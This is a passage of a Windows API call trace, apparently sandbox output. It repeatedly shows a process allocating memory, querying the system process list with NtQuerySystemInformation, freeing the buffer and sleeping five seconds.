SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.545] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.552] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.560] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.567] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.580] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.586] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.601] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.608] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.622] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.628] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.642] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.671] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.678] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.685] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 